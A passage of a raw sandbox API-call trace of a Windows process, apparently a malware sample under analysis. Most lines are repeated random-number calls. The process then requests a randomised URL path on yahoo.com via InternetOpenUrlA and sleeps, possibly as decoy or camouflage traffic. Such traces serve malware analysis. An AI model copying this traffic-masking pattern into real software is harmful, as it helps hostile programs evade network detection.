(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e49, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4d5e49) returned 0x0 [0202.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0202.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e67, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x4d5e67) returned 0x0 [0202.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e7d, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d5e7d) returned 0x0 [0202.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.749] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0202.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.762] GetProcessHeap () returned 0x440000 [0202.762] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0202.762] lstrcpyA (in: lpString1=0x473770, lpString2="Å¡\x96\x04s://www.yahoo.com" | out: lpString1="Å¡\x96\x04s://www.yahoo.com") returned="Å¡\x96\x04s://www.yahoo.com" [0202.762] lstrcatA (in: lpString1="Å¡\x96\x04s://www.yahoo.com", lpString2="/lp1gy5i58i7vdud18lnFN31lZwwgq2bLIf8xNyo/nc11qfcrl2pjpyli0jTsw91pn3d39/S40t8yei1xx4nsgydKpIp/9zhak9hg92xdwQ51k0JK53quz2z06lsel6K58/" | out: lpString1="Å¡\x96\x04s://www.yahoo.com/lp1gy5i58i7vdud18lnFN31lZwwgq2bLIf8xNyo/nc11qfcrl2pjpyli0jTsw91pn3d39/S40t8yei1xx4nsgydKpIp/9zhak9hg92xdwQ51k0JK53quz2z06lsel6K58/") returned="Å¡\x96\x04s://www.yahoo.com/lp1gy5i58i7vdud18lnFN31lZwwgq2bLIf8xNyo/nc11qfcrl2pjpyli0jTsw91pn3d39/S40t8yei1xx4nsgydKpIp/9zhak9hg92xdwQ51k0JK53quz2z06lsel6K58/" [0202.762] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0202.762] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="Å¡\x96\x04s://www.yahoo.com/lp1gy5i58i7vdud18lnFN31lZwwgq2bLIf8xNyo/nc11qfcrl2pjpyli0jTsw91pn3d39/S40t8yei1xx4nsgydKpIp/9zhak9hg92xdwQ51k0JK53quz2z06lsel6K58/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0202.762] GetProcessHeap () returned 0x440000 [0202.762] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0202.762] GetProcessHeap () returned 0x440000 [0202.762] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0202.763] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0202.763] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0202.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0202.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0202.764] Sleep (dwMilliseconds=0x1c84b) [0203.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0203.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0203.037] GetProcessHeap () returned 0x440000 [0203.037] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d6300 [0203.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0203.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6301, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x4d6301) returned 0x0 [0203.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 